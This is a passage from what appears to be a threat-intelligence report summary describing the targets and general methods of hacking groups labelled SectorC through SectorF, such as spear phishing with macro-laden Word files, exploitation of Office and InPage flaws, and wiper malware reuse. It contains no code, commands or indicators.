Although hacking activities by SectorC groups around the world were conducted mainly to obtain information related to government agencies, they seem to be targeting Eastern Europe for other purposes based on the characteristics of their malware. SectorC still uses Spear Phishing with code execution vulnerabilities in Microsoft Word files or Microsoft Word files with macros for the initial infection in order to drop variants of their usual malware, although this time they have also included variants written in a different programming language. In addition, SectorC sometimes used only script and normal utility files for attacks on Eastern Europe.


4. SectorD Activity Features

A total of four hacking groups were found to be active within SectorD, and targets were concentrated in Middle Eastern countries, including Lebanon, Oman, Jordan, Saudi Arabia, Turkey, Iraq and Israel.

In addition to the use of Phishing websites, there were also cases where Spear Phishing was used with malware in the form of Microsoft Word files containing macros.

Although SectorD groups mainly utilize script-based malware, there were cases of hacking activities targeted at energy companies in Italy with ties to the Middle East which had reused the Wiper malware which was used in the past to disrupt normal system operations.


5. SectorE Activity Features

A total of three hacking groups activity were found to be active within SectorE, and targets were along the Central Asia region, which includes Pakistan, a political rival of SectorE, as well as Chinese companies.

The hacking activities of the SectorE took advantage of vulnerabilities in Microsoft Office, or Spear Phishing involving file-based malware that exploited vulnerabilities in InPage software, along with malware in the form of Word or Excel files containing macros.

In addition, the execution of malware is structured so that the download function is executed in the first step, and the next steps only work if the first one succeeded, reducing exposure to the outside as much as possible. However, as their malware, C2 IPs and C2 Domains were found to have some overlapping characteristics, it can be seen that SectorE groups share various hacking and malware production techniques.


6. SectorF Activity Features

SectorF activities were discovered targeting East Asia, including China and Japan.

They primarily utilizing Spear Phishing, attaching Microsoft Word files containing macros to emails.

While some of the code used in their malware was found to have been produced based on open source code used for penetration testing, others were found to be variants of their custom malware.


The full report detailing each event together with IOCs and recommendations is available to existing NSHC Threat Recon customers.